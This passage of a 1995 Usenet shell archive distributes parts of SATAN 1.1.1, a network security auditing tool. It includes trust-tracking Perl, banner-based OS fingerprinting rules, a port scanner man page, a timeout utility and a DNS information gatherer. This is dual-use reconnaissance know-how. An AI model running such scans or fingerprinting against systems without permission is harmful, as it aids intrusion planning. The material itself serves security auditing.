Xlocal($path) = @_;
X
Xopen(TODO, $path) || die "cannot read old todo list from $path: $!";
Xprint "Reading old todo list from $path...\n" if $debug;
Xwhile (<TODO>) {
X chop;
X $old_todos{$_} = 1;
X }
Xclose(TODO);
X}
X
X#
X# Run a tool and collect its output.
X#
Xsub run_next_todo
X{
Xlocal($target, $tool, $args) = @_;
Xlocal($text, $ttl);
X
X$ttl = (defined($timeouts{$tool}) ? $timeouts{$tool} : $timeout);
X
X$command = "bin/$tool $args $target";
X
X# Update host last access time.
X&set_host_time($target);
X
X# Damn the torpedoes!
Xdie "Can't run $tool\n" unless &open_cmd(TOOL, $ttl, $command);
X
Xwhile (<TOOL>) {

X chop;
X &add_fact($_);
X }
X

Xclose(TOOL);
X
X# Did we fly like the mighty turkey or soar like an...?
X# If the former, assume that we need to output an error record...
Xif ($?) {
X # based on exit value, decide what happened:
X if ($? == $timeout_kill) { $text = "program timed out"; }
X elsif ($? > 0 && $? < $timeout_kill) {
X $text = "internal program error $?";
X }
X else { $text = "unknown error #$?"; }
X
X &add_fact("$target|$tool|u|||||$text");
X }
X
X}
X
X1;
END_OF_FILE
if test 3574 -ne `wc -c <'satan-1.1.1/perl/todo.pl'`; then
echo shar: \"'satan-1.1.1/perl/todo.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/todo.pl'
fi
if test -f 'satan-1.1.1/perl/trust.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/trust.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/trust.pl'\" $3093 characters$
sed "s/^X//" >'satan-1.1.1/perl/trust.pl' <<'END_OF_FILE'
X#
X# update_trust - maintain trust statistics
X#
X# Output to:
X#
X# $total_trusted_count{host} number of non-ANY trust relationships
X# $total_trusted_names{host} names of trusted hosts
X#
X# $total_trustee_count{host} number of non-ANY trust relationships
X# $total_trustee_names{host} names of trustee hosts
X#
X# $trust_host_type{trusted trustee}{type} all facts about this relationship.
X# $trust_type_host{type}{trusted trustee} all facts about this relationship.
X#
X
X$trust_files = "rules/trust";
X$trust_other = "other";
X
Xsub build_update_trust {
X local($files) = @_;
X local($code, $type);
X
X $code = '
Xsub update_trust {
X local($td_host, $te_host);
X ($td_host = $trusted) =~ s/(.*@)?(.*)/$2/;
X ($te_host = $trustee) =~ s/(.*@)?(.*)/$2/;
X
X return
X if $td_host eq "" || $te_host eq ""
X || $td_host eq "ANY" || $td_host eq $te_host;
X
X if (!exists($trust_host_type{"$td_host $te_host"})) {
X $total_trustee_names{$td_host} .= "$te_host ";
X $total_trustee_count{$td_host}++;
X $total_trusted_names{$te_host} .= "$td_host ";
X $total_trusted_count{$te_host}++;
X }
X';
X

X s/@/\\@/g;
X ($cond, $type) = split(/\t+/, $_, 2);

X die "missing trust type" if $type eq "";

X $code .= "\
X if ($cond) {

X \$trust_host_type{\"\$td_host \$te_host\"}{\"$type\"} .= \$_ . \"\\n\";
X \$trust_type_host{\"$type\"}{\"\$td_host \$te_host\"} .= \$_ . \"\\n\";
X return;
X }\

X";
X }
X close(RULES);
X }
X $code .= "\

X \$trust_host_type{\"\$trustee \$trusted\"}{\"other\"} .= \$_ . \"\\n\";
X \$trust_type_host{\"other\"}{\"\$trustee \$trusted\"} .= \$_ . \"\\n\";
X}\n";

X return $code;
X}
X
X#

X# Reset all trust information tables.
X#
Xsub clear_trust_info {
X %total_trust_pair = ();
X %total_trustee_names = ();
X %total_trustee_count = ();
X %total_trusted_names = ();
X %total_trusted_count = ();
X %trust_host_type = ();

X}
X
X#
X# Some scaffolding for stand-alone operation
X#
Xif ($running_under_satan) {

X eval &build_update_trust($trust_files);
X die "error in $trust_files: $@" if $@;

X} else {
X $running_under_satan = -1;
X $debug = 1;
X
X require 'perl/misc.pl';
X
X #
X # Generate code from rules files.
X #

X $code = &build_update_trust($trust_files);
X print "Code generated from $trust_files:\n\n";

X print $code;
X eval $code;

X die "error in $trust_files: $@" if $@;

X
X #
X # Apply rules.
X #
X print "\nApplying rules to all SATAN records...\n";
X while (<>) {
X chop;
X if (&satan_split($_) == 0) {

X &update_trust($_);
X }
X }
X
X print "Trusted Trustee Type...\n";
X for $pair (sort keys %trust_host_type) {
X print $pair,' ',sort(join(' ', keys %{$trust_host_type{$pair}})),"\n";
X }
X
X print "\nType Trusted Trustee...\n";
X for $type (sort keys %trust_type_host) {
X for $pair (sort keys %{$trust_type_host{$type}}) {
X print "$type $pair\n";

X }
X }
X}
X
X1;
END_OF_FILE

if test 3093 -ne `wc -c <'satan-1.1.1/perl/trust.pl'`; then
echo shar: \"'satan-1.1.1/perl/trust.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/perl/trust.pl'
fi
if test -f 'satan-1.1.1/rules/hosttype' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/rules/hosttype'\"
else
echo shar: Extracting \"'satan-1.1.1/rules/hosttype'\" $3497 characters$
sed "s/^X//" >'satan-1.1.1/rules/hosttype' <<'END_OF_FILE'
X#
X# Rules that recognize host types from telnet/ftp/smtp banners. These are
X# applied to every telnet/ftp/sendmail record. Format of this file is:
X#
X# CLASS class_name
X# condition TABs hosttype
X#
X# Empty lines and text after a "#" character are ignored. Long lines may
X# be broken with backslash-newline.
X#
X# The class_name is used for the first rough breakdown by host type in,
X# for example, reports. It should be a major software category.
X#
X# The condition is a PERL expression, with full access to the global
X# $target..$text variables; HOSTTYPE stands for the current hostname
X# info for the target host. UNKNOWN is true when the host type is unknown.
X#
X# The hosttype field is an expression that evaluates to a host type;
X# when it is absent, the value $1 is taken.
X#
X#
X# version 1, Sun Mar 26 18:39:56 1995, last mod by zen
X#
X
X#
X# Beware: AIX 3.x telnetd claims to be version 3.
X#
XCLASS AIX
X/(AIX [.0-9]+)/
X/AIX Version ([.0-9]+)/ "AIX $1"
X/AIX Version ([0-9]) / && length(HOSTTYPE) <= 3 "AIX $1"
XUNKNOWN && /(AIX)/
X
X#
X# Beware: Ultrix 4.x ftpd claims to be version 4.1.
X#
XCLASS Ultrix
X/ultrix[\/v ]+([.0-9]+[A-Z]*)/i "Ultrix $1"
X/ultrix version 4/i && length(HOSTTYPE) <= 6 "Ultrix 4"
XUNKNOWN && /ultrix/i "Ultrix"
X
XCLASS VMS
X/(VAX\/VMS)/
X/(OpenVMS)/
XUNKNOWN && /MultiNet/ "VAX/VMS"
X
X#
X# The first pattern is good for HP-UX 8.x and 9.x telnetd.
X#
XCLASS HP
X/(HP-UX) .+ ([AB1-7]\.[A-Za-z0-9.]+) / "$1 $2"
XUNKNOWN && /(HP-UX)/
XUNKNOWN && /HP Sendmail/ "HP-UX"
X
X#
X# What about earlier IRIX versions?
X#
XCLASS SGI
X/IRIX System V.3/ "IRIX 4"
X/IRIX System V.4/ "IRIX 5"
XUNKNOWN && /\b(IRIX|SGI)\b/ "IRIX"
X
X#
X# SunOS 4.x ftpd and sendmail claim to be version 4.1
X# SunOS 5.x ftpd and telnetd claim to be generic SYSV40
X# SunOS 5.x will end up as "other" when they replaced sendmail
X#
XCLASS SUN
XUNKNOWN && /SunOS/ "SunOS 4"
X/4.1\/SMI-4.1/ "SunOS 4"
X/SMI-SVR4/ "SunOS 5"
X
X#
X# Domain/OS ftpd gives more specific version information than telnetd.
X#
XCLASS APOLLO
X/(Domain\/OS sr[.0-9]+)/ && length($1) > length(HOSTTYPE)
XUNKNOWN && /(Domain\/OS)/
X/Apollo/ "Domain/OS"
X
X#
X# Beware: NeXTStep 3.x ftp announces itself as NeXT 1.0.
X# Beware: NeXTStep 3.x sendmail announces itself as NX5.xx/NX3.0.
X#
XCLASS NEXT
X/NX.*\/NX([0-9]+)/ "NeXTStep $1"
XUNKNOWN && /(NeXT)/ "NeXTStep"
X
X#
X# Data General
X#
XCLASS DG/UX
XUNKNOWN && /\b(DG\/UX)\b/ $1
X/DG\/UX .* Release ([-\/A-Z0-9.]+)/ "DG/UX $1"
X
X#
X# Linux
X#
XCLASS LINUX
XUNKNOWN && /(Linux)/
X/(Linux [0-9.]+)/
X
X#
X# 4.4 BSD, BSDI, etc.
X#
XCLASS 4.4 BSD
X/(FreeBSD|NetBSD)/
X# e.g. BSDI BSD/386 1.1
X/(BSDI) BSD\/[0-9]+\s([0-9]+)/ "$1 $2"
X# e.g. BSDI BSD/OS 2.0
X/(BSDI) BSD\/OS\s([0-9]+)/ "$1 $2"
X
X#
X# Apple A/UX
X#
XCLASS A/UX
X/A\/UX.([.0-9]+)/ "A/UX $1"
X/(A\/UX)/
X
X#
X# Sequent slipped by us!
XCLASS Sequent
X/(DYNIX\/ptx)/
X/DYNIX$R$ (V[.0-9]+)/ "DYNIX $1"
X/DYNIX/ "Sequent/DYNIX"
X
X#
X# Sony NEWS-OS
XCLASS SONY
X/NEWS-OS Release ([.0-9]+)/ "NEWS-OS $1"
X/(NEWS-OS)/
X
X#
X# Missed'em five
X#
XCLASS SYSTEM V
XUNKNOWN && /(System V) Release ([.0-9]+)/ "$1.$2"
XUNKNOWN && /(System V[.0-9]*)/
X
X#
X# Not really mainstream, but...
X#
XCLASS OSF
X/OSF\/([.0-9]+)/ "OSF $1"
X
X#
X# Some of these still need some refinement.
X#
XCLASS other
X/(Macintosh|ConvexOS)/
X/(Windows NT|OS\/2)/
X/VersaTerm/ "Macintosh"
X/(Codonics|APS-TI|Cray UNICOS)/
X/InfiniteStorage/ "Epoch"
X/(PC\/TCP)/
X/(NetWare|NEWT)\s*[Vv]*([.0-9]*)/ "$1 $2"
X/\b(CMC)\b/
X/(Epoch|RTU) /
X/(IBM VM|IBM MVS)/
END_OF_FILE
if test 3497 -ne `wc -c <'satan-1.1.1/rules/hosttype'`; then
echo shar: \"'satan-1.1.1/rules/hosttype'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/rules/hosttype'
fi
if test -f 'satan-1.1.1/src/boot/bootparam_prot.x' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/boot/bootparam_prot.x'\"
else
echo shar: Extracting \"'satan-1.1.1/src/boot/bootparam_prot.x'\" $3019 characters$
sed "s/^X//" >'satan-1.1.1/src/boot/bootparam_prot.x' <<'END_OF_FILE'

X * RPC for bootparms service.
X * There are two procedures:
X * WHOAMI takes a net address and returns a client name and also a
X * likely net address for routing
X * GETFILE takes a client name and file identifier and returns the
X * server name, server net address and pathname for the file.
X * file identifiers typically include root, swap, pub and dump
X */
X
X#ifdef RPC_HDR
X%#include <rpc/types.h>
X%#include <sys/time.h>
X%#include <sys/errno.h>
X%/*#include <nfs/nfs.h>*/
X#else
X%#ifndef lint
X%/*static char sccsid[] = "from: @(#)bootparam_prot.x 1.2 87/06/24 Copyr 1987 Sun Micro";*/
X%/*static char sccsid[] = "from: @(#)bootparam_prot.x 2.1 88/08/01 4.0 RPCSRC";*/
X%static char rcsid[] = "$Id: bootparam_prot.x,v 1.1 1994/08/04 19:01:44 wollman Exp $";

X%#endif /* not lint */
X#endif
X

Xconst MAX_MACHINE_NAME = 255;
Xconst MAX_PATH_LEN = 1024;
Xconst MAX_FILEID = 32;
Xconst IP_ADDR_TYPE = 1;
X
Xtypedef string bp_machine_name_t<MAX_MACHINE_NAME>;
Xtypedef string bp_path_t<MAX_PATH_LEN>;
Xtypedef string bp_fileid_t<MAX_FILEID>;
X
Xstruct ip_addr_t {
X char net;
X char host;
X char lh;
X char impno;
X};
X
Xunion bp_address switch (int address_type) {
X case IP_ADDR_TYPE:
X ip_addr_t ip_addr;
X};
X
Xstruct bp_whoami_arg {
X bp_address client_address;
X};
X
Xstruct bp_whoami_res {
X bp_machine_name_t client_name;
X bp_machine_name_t domain_name;
X bp_address router_address;
X};
X
Xstruct bp_getfile_arg {
X bp_machine_name_t client_name;
X bp_fileid_t file_id;
X};
X
Xstruct bp_getfile_res {
X bp_machine_name_t server_name;
X bp_address server_address;
X bp_path_t server_path;
X};
X
Xprogram BOOTPARAMPROG {
X version BOOTPARAMVERS {
X bp_whoami_res BOOTPARAMPROC_WHOAMI(bp_whoami_arg) = 1;
X bp_getfile_res BOOTPARAMPROC_GETFILE(bp_getfile_arg) = 2;
X } = 1;
X} = 100026;
END_OF_FILE
if test 3019 -ne `wc -c <'satan-1.1.1/src/boot/bootparam_prot.x'`; then
echo shar: \"'satan-1.1.1/src/boot/bootparam_prot.x'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/boot/bootparam_prot.x'
fi
if test -f 'satan-1.1.1/src/fping/CHANGES' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/fping/CHANGES'\"
else
echo shar: Extracting \"'satan-1.1.1/src/fping/CHANGES'\" $2952 characters$
sed "s/^X//" >'satan-1.1.1/src/fping/CHANGES' <<'END_OF_FILE'
X* Revision 1.20 1993/02/23 00:16:38 schemers
X
Xfixed syntax error (should have compiled before checking in...)
X
X* Revision 1.19 1993/02/23 00:15:15 schemers
X
Xturned off printing of "is alive" when -a is specified.
X
X* Revision 1.18 1992/07/28 15:16:44 schemers
X
Xadded a fflush(stdout) call before the summary is sent to stderr, so
Xeverything shows up in the right order.
X
X* Revision 1.17 1992/07/23 03:29:42 schemers
X* Revision 1.16 1992/07/22 19:24:37 schemers
X
XFixed declaration of timeval_diff. Didn't notice the problem because
XI use 'cc' in stead of gcc under Ultrix. Time to switch? :-)
X
XModified file reaing so it would skip blank lines or lines starting
Xwith a '#'. Now you can do something like:
X
Xfping -ad < /etc/hosts
X
X* Revision 1.15 1992/07/21 17:07:18 schemers
X
XPut in sanity checks so only root can specify "dangerous" options.
XChanged usage to show switchs in alphabetical order.
X* Revision 1.14 1992/07/21 16:40:52 schemers
X* Revision 1.13 1992/07/17 21:02:17 schemers
X
XChanged the default timeout to 2500 msec, and retry to 3. This was
Xdue to suggestions from people with slow (WAN) networks. The default
X1 sec timeout was too fast.
X
X
XAdded '-e' option for showing elapsed (round-trip) times on pakets, and
Xmodified the -s option to include min, max, and average round-trip times,
Xand over all elapsed time.
X
XModified action taken when a error is returned from sendto. The action
Xtaken now considers the host unreachable and prints the hostname
Xfollowed by the errno message. The program will not exit and will continue
Xto try other hosts.
X
X* Revision 1.12 1992/07/17 16:38:54 schemers
X* Revision 1.11 1992/07/17 16:28:38 schemers
X
X move socket create call so I could do a setuid(getuid()) before the
X fopen call is made. Once the socket is created root privs aren't needed
X to send stuff out on it.
X
X moved num_timeout counter. It really was for debug purposes and didn't
X make sense to the general public :-) Now it is the number of timeouts
X (pings that didn't get received with the time limit).
X
X
X* Revision 1.10 1992/07/16 16:24:38 schemers
X* Revision 1.9 1992/07/16 16:00:04 schemers
X* Revision 1.8 1992/07/16 05:44:41 schemers
X
XAdded _NO_PROTO stuff for older compilers, and _POSIX_SOURCE
Xfor unistd.h, and _POSIX_SOURCE for stdlib.h. Also added
Xcheck for __cplusplus.
X
XNow compiles ok under Ultrix 3.1, and Sun4 using cc. Also compiled
Xok using g++ 2.2.2.
X
XChanged '-a' and '-u' flags to be mutually exclusive (makes sense, since
Xspecifiying both '-a' and '-u' is the same as not specifiying anything.
XSince '-a' and '-u' are mutually exclusive, these options now only print
Xthe hostname, and not the 'is alive' or 'is unreachable' messages.
XThis makes it much easier to do stuff like:
X
X#!/usr/local/bin/perl
X$hosts_to_backup=`cat /etc/hosts.backup|fping -a`;
X
XSince you don't have to strip off the 'is alive' messages.
X
XChanged usage to and stats to print to stderr instead of stdout.
X
X
END_OF_FILE
if test 2952 -ne `wc -c <'satan-1.1.1/src/fping/CHANGES'`; then
echo shar: \"'satan-1.1.1/src/fping/CHANGES'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/fping/CHANGES'
fi
if test -f 'satan-1.1.1/src/misc/timeout.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/misc/timeout.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/misc/timeout.c'\" $1619 characters$
sed "s/^X//" >'satan-1.1.1/src/misc/timeout.c' <<'END_OF_FILE'
X /*
X * timeout - run a command for a limited amount of time
X *
X * Uses POSIX process groups so that we do the right thing when the controlled
X * command forks off child processes.

X *
X * Author: Wietse Venema.
X */
X

X/* System libraries. */
X
X#include <sys/types.h>

X#include <signal.h>

X#include <stdlib.h>
X#include <unistd.h>
X#include <stdio.h>
X

Xextern int optind;
X
X/* Application-specific. */
X
X#define perrorexit(s) { perror(s); exit(1); }
X
Xstatic int kill_signal = SIGKILL;
Xstatic char *progname;

X
Xstatic void usage()
X{

X fprintf(stderr, "usage: %s [-signal] time command...\n", progname);
X exit(1);
X}
X
Xstatic void terminate(sig)
Xint sig;
X{
X kill(0, kill_signal);
X}
X
Xint main(argc, argv)

Xint argc;
Xchar **argv;
X{

X int time_to_run;
X pid_t pid;
X pid_t child_pid;
X int status;

X
X progname = argv[0];
X
X /*
X * Parse JCL.
X */

X while (--argc && *++argv && **argv == '-')
X if ((kill_signal = atoi(*argv + 1)) <= 0)
X usage();
X
X if (argc < 2 || (time_to_run = atoi(argv[0])) <= 0)
X usage();
X
X /*
X * Run the command and its watchdog in a separate process group so that
X * both can be killed of with one signal.
X */
X setsid();
X switch (child_pid = fork()) {

X case -1: /* error */

X perrorexit("timeout: fork");
X case 00: /* run controlled command */
X execvp(argv[1], argv + 1);
X perrorexit(argv[1]);
X default: /* become watchdog */
X (void) signal(SIGALRM, terminate);
X alarm(time_to_run);
X while ((pid = wait(&status)) != -1 && pid != child_pid)
X /* void */ ;
X return (pid == child_pid ? status : -1);
X }
X}
END_OF_FILE
if test 1619 -ne `wc -c <'satan-1.1.1/src/misc/timeout.c'`; then
echo shar: \"'satan-1.1.1/src/misc/timeout.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/misc/timeout.c'
fi
if test -f 'satan-1.1.1/src/port_scan/tcp_scan.1' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/port_scan/tcp_scan.1'\"
else
echo shar: Extracting \"'satan-1.1.1/src/port_scan/tcp_scan.1'\" $3228 characters$
sed "s/^X//" >'satan-1.1.1/src/port_scan/tcp_scan.1' <<'END_OF_FILE'
X.TH TCP_SCAN 1
X.SH NAME
Xtcp_scan, udp_scan \- internet port scanners
X.SH SYNOPSIS
X.B tcp_scan
X[-abuU] [-l load] [-s string] [-w time] host service(s)...
X.sp
X.B udp_scan
X[-apuU] [-l load] host service(s)...
X.SH DESCRIPTION
XThese commands take a list of internet services and investigate which
Xservices are available from a given host. The \fItcp_scan\fR command
Xlooks for connection-oriented services; \fIudp_scan\fR identifies
Xactive datagram ports.
X.sp
XEach \fIservice\fR argument may be specified as a symbolic name
X(telnet), a port number (23), an interval (1-1023, telnet-smtp) or an
Xinterval with the lower or upper bounds missing (the default bounds are
X1 and 65535, respectively).
X.sp
XOptions:
X.IP -a
XReport status of all specified services.
X.IP "-b (tcp_scan only)"
XReport banner information. Banners are converted to printable form
Xusing C-like escape sequences. Whenever \fItcp_scan\fR finds that the
Xserver does telnet options negotiation it sets the 't' flag in the
Xoutput. This is useful to detect telnet servers on non-standard ports.
X.IP "-l load"
XMinimize the impact of network roundtrip delays by performing
X\fIload\fR network probes in parallel. The default load is the
Xper-process open-file limit - 10.
X.IP "-p port (udp_scan only)"
XUse this port to verify that the host or network is alive. By default
Xthe UDP port scanner uses port number 1. Specify a port number that is
Xknown to be unreachable or inactive.
X.IP "-s string (tcp_scan only)"
XAfter a connection has been established, send
X.I string
Xto the server. The following backslash escapes can be used: \\ooo
X(octal character code), \\b (backspace), \\f (formfeed), \\n (newline),
X\\r (carriage-return), \\s (space), and \\t (horizontal tab). The
X.I string
Xshould be enclosed between quotes if it contains shell meta characters.
X.IP "-t time (tcp_scan only)"
XGive up when the program has not found out anything within
X.I time
Xseconds. This bounds the time lost when scanning systems with broken
XTCP/IP implementations that do not send RESETs when contacted at a dead
Xport. The udp scanner already has a built-in mechanism to detect dead
Xhosts.
X.IP -u
XReport probes that fail with "Host unreachable". Use this with packet
Xfilters that pass most traffic.
X.IP -U
XReport probes that do \fInot\fR fail with "Host unreachable". Use this
Xwith packet filters that block most traffic.
X.IP "-w time (tcp_scan only)"
XWait for at most \fItime\fR seconds for banner information.
X.SH WARNING
XThese programs will raise lots of alarms on sites that run the \fItcp
Xwrapper\fR or other network logging software. Use only with prior
Xpermission.
X.SH BUGS
XThe UDP port scanner relies on ICMP replies to detect that a service is
Xunavailable, and may report false positives when the host or network
Xdies in the middle of a measurement.
X.PP
XThe TCP port scanner does not keep track of roundtrip times or
Xof retransmissions, and may overload hosts or networks.
X.PP
XWith some UNIX implementations, a single "Host unreachable" condition
Xaffects all connections that are being established with that host.
X.PP
XWith some UNIX implementations, a single "Host unreachable" condition
Xaffects all TCP connections to that host, even those that already
Xexist.
X.SH AUTHOR
XWietse Venema
END_OF_FILE
if test 3228 -ne `wc -c <'satan-1.1.1/src/port_scan/tcp_scan.1'`; then
echo shar: \"'satan-1.1.1/src/port_scan/tcp_scan.1'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/port_scan/tcp_scan.1'
fi
if test -f 'satan-1.1.1/src/rpcgen/rpc_parse.h' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/rpcgen/rpc_parse.h'\"
else
echo shar: Extracting \"'satan-1.1.1/src/rpcgen/rpc_parse.h'\" $3419 characters$
sed "s/^X//" >'satan-1.1.1/src/rpcgen/rpc_parse.h' <<'END_OF_FILE'

X/* @(#)rpc_parse.h 1.3 87/03/09 (C) 1987 SMI */
X
X/*
X * rpc_parse.h, Definitions for the RPCL parser

X * Copyright (C) 1987, Sun Microsystems, Inc.
X */
X

Xenum defkind {
X DEF_CONST,
X DEF_STRUCT,
X DEF_UNION,
X DEF_ENUM,
X DEF_TYPEDEF,
X DEF_PROGRAM
X};
Xtypedef enum defkind defkind;
X
Xtypedef char *const_def;
X
Xenum relation {
X REL_VECTOR, /* fixed length array */
X REL_ARRAY, /* variable length array */
X REL_POINTER, /* pointer */
X REL_ALIAS, /* simple */
X};
Xtypedef enum relation relation;
X
Xstruct typedef_def {
X char *old_prefix;
X char *old_type;
X relation rel;
X char *array_max;
X};
Xtypedef struct typedef_def typedef_def;
X
X
Xstruct enumval_list {
X char *name;
X char *assignment;
X struct enumval_list *next;
X};
Xtypedef struct enumval_list enumval_list;
X
Xstruct enum_def {
X enumval_list *vals;
X};
Xtypedef struct enum_def enum_def;
X
X
Xstruct declaration {
X char *prefix;
X char *type;
X char *name;
X relation rel;
X char *array_max;
X};
Xtypedef struct declaration declaration;
X
X
Xstruct decl_list {
X declaration decl;
X struct decl_list *next;
X};
Xtypedef struct decl_list decl_list;
X
Xstruct struct_def {
X decl_list *decls;
X};
Xtypedef struct struct_def struct_def;
X
X
Xstruct case_list {
X char *case_name;
X declaration case_decl;
X struct case_list *next;
X};
Xtypedef struct case_list case_list;
X
Xstruct union_def {
X declaration enum_decl;
X case_list *cases;
X declaration *default_decl;
X};
Xtypedef struct union_def union_def;
X
X
X
Xstruct proc_list {
X char *proc_name;
X char *proc_num;
X char *arg_type;
X char *arg_prefix;
X char *res_type;
X char *res_prefix;
X struct proc_list *next;
X};
Xtypedef struct proc_list proc_list;
X
X
Xstruct version_list {
X char *vers_name;
X char *vers_num;
X proc_list *procs;
X struct version_list *next;
X};
Xtypedef struct version_list version_list;
X
Xstruct program_def {
X char *prog_num;
X version_list *versions;
X};
Xtypedef struct program_def program_def;
X
Xstruct definition {
X char *def_name;
X defkind def_kind;
X union {
X const_def co;
X struct_def st;
X union_def un;
X enum_def en;
X typedef_def ty;
X program_def pr;
X } def;
X};
Xtypedef struct definition definition;
X
X/* @(#)rpc_parse.h 2.1 88/08/01 4.0 RPCSRC */
Xdefinition *get_definition();
END_OF_FILE
if test 3419 -ne `wc -c <'satan-1.1.1/src/rpcgen/rpc_parse.h'`; then
echo shar: \"'satan-1.1.1/src/rpcgen/rpc_parse.h'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/rpcgen/rpc_parse.h'
fi
echo shar: End of archive 10 $of 15$.
cp /dev/null ark10isdone

Wietse Venema

unread,

Apr 13, 1995, 3:00:00 AM4/13/95

Submitted-by: wswi...@wsbs06.win.tue.nl (Wietse Venema)
Posting-number: Volume 47, Issue 135
Archive-name: satan/part11

Environment: UNIX && HTML && Perl 5.0

#! /bin/sh

# This is a shell archive. Remove anything before this line, then feed it
# into a shell via "sh file" or similar. To overwrite existing files,
# type "sh file -c".

# Contents: satan-1.1.1/bin/dns.satan satan-1.1.1/bin/showmount.satan
# satan-1.1.1/html/docs/acknowledgements.html
# satan-1.1.1/html/docs/design.html
# satan-1.1.1/html/docs/philosophy.html
# satan-1.1.1/html/docs/satan_reference.html
# satan-1.1.1/html/docs/trust.html
# satan-1.1.1/html/tutorials/vulnerability/NFS_export_via_portmapper.html
# satan-1.1.1/html/tutorials/vulnerability/NIS_password_file_access.html
# satan-1.1.1/perl/domains.pl satan-1.1.1/perl/infer_todo.pl
# satan-1.1.1/perl/run-satan.pl satan-1.1.1/perl/satan-data.pl
# satan-1.1.1/perl/severities.pl satan-1.1.1/rules/todo
# satan-1.1.1/satan satan-1.1.1/src/boot/boot.c
# satan-1.1.1/src/port_scan/error.c
# satan-1.1.1/src/rpcgen/rpc_util.h
# Wrapped by kent@ftp on Wed Apr 12 20:30:10 1995

PATH=/bin:/usr/bin:/usr/ucb:/usr/local/bin:/usr/lbin:$PATH ; export PATH
echo If this archive is complete, you will see the following message:

echo ' "shar: End of archive 11 (of 15)."'
if test -f 'satan-1.1.1/bin/dns.satan' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/dns.satan'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/dns.satan'\" $2570 characters$
sed "s/^X//" >'satan-1.1.1/bin/dns.satan' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X#
X# information gatherer for dns -- uses NSLOOKUP, so you're hosed
X# unless you have that...
X#
X# XXX Must look for address->name servers too.
X#
X$running_under_satan = 1;
X
Xrequire 'config/paths.pl';
Xrequire 'perl/misc.pl';
Xrequire 'perllib/getopts.pl';
X
X#
X$usage="Usage: $0 target\n";
X&Getopts("v");
X
Xif ($#ARGV < 0) {
X print STDERR $usage;
X exit 1;
X }
X$target = $ARGV[0];
X$service = &basename($0, ".satan");
X
X$status = "a";
X
X# open up NSLOOKUP
Xdie "Can't run $NSLOOKUP\n" unless open(NS, "$NSLOOKUP <<EOC
Xset qt=any
X$target.
XEOC |");
X
X# until we change this, query away...
X$done = 0;
X
Xwhile (<NS>) {
X next if ($_ =~ />/);
X chop;
X
X # pick up any tidbits along the way...
X &get_misc_dns_info();
X
X # ok, lets get the places we can get authoritative answers...
X if ($_ =~ /Authoritative answers/) { while (<NS>) {
X last if ($_ =~ />/);
X chop;
X &get_misc_dns_info();
X ($auth, $garbage) = split;
X $all_auth{"\L$auth\E"} = "\L$auth\E";
X }
X }
X }
X
X$trustee = "";
X$trusted = "";
X$severity = "";
X$target_orig = $target;
X
Xfor $cpu (keys %cpu) {
X $service_output = $cpu{$cpu};
X $target = $cpu;
X $text = "HINFO output";
X &satan_print();
X }
Xfor $os (keys %os) {
X $service_output = $os{$os};
X $target = $os;
X $text = "HINFO output";
X &satan_print();
X }
Xfor $ma (keys %ma) {
X $ma{$ma} =~ s/^([^\.]+)\.(.+)$/$1\@$2/;
X $severity = "x";
X $target = $ma;
X $service_output = $ma{$ma};
X $trusted = $ma;
X $text = "Mail address for DNS contact";
X &satan_print();
X }
Xfor $me (keys %me) {
X $severity = "x";
X $target = $target_orig;
X # do we want the number here?
X # $service_output = "$me $me{$me}";
X $service_output = $me;
X $trusted = $me;
X $text = "Mail exchanger";
X &satan_print();
X }
X
X# pursue this?
X#
X# print "\nauth-answers from:\n" if (defined(%all_auth));
X# for $au (values %all_auth) {
X# print "$au\n";
X# }
X
X# print "\nnameservers:\n" if (defined(%ns));
X$trustee = "$target";
Xfor $ns (values %ns) {
X $severity = "host";
X $target = $target_orig;
X $trusted = $ns;
X $service_output = "";
X $text = "authoritative DNS host";
X &satan_print();
X }
X
X#
X# suck in various stuff we can get from the records -- mail exchanger, cpu, etc.
X#
Xsub get_misc_dns_info {
X
Xif ($_ =~ /nameserver =/) { ($ns) = /nameserver = (\S+)/; $ns{$ns}="\L$ns\E"; }
Xif ($_ =~ /CPU\s*=/) { ($cpu{$target}) = /CPU\s*=\s*(\S+)/; }
Xif ($_ =~ /OS\s*=/) { ($os{$target}) = /OS\s*=\s*(\S+)/; }
X
Xif ($_ =~ /mail exchanger/) {
X ($pref, $me) = /preference = (\S+).*mail exchanger = (\S+)/;
X $pref =~ s/,//;
X $me{$me} = $pref;
X }
X
Xif ($_ =~ /mail addr/) { ($ma{$target}) = /mail addr = (\S+)/; }
X
X}
END_OF_FILE
if test 2570 -ne `wc -c <'satan-1.1.1/bin/dns.satan'`; then
echo shar: \"'satan-1.1.1/bin/dns.satan'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/dns.satan'
# end of 'satan-1.1.1/bin/dns.satan'
fi
if test -f 'satan-1.1.1/bin/showmount.satan' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/showmount.satan'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/showmount.satan'\" $2627 characters$
sed "s/^X//" >'satan-1.1.1/bin/showmount.satan' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X#
X# Find out some stuff about NFS using showmount: world-wide exports,
X# boot clients. Should not bother to do this when rpc.rip fails.
X#
X
X# require these packages:
X$running_under_satan = 1;
Xrequire "config/paths.pl";
Xrequire "perl/misc.pl";
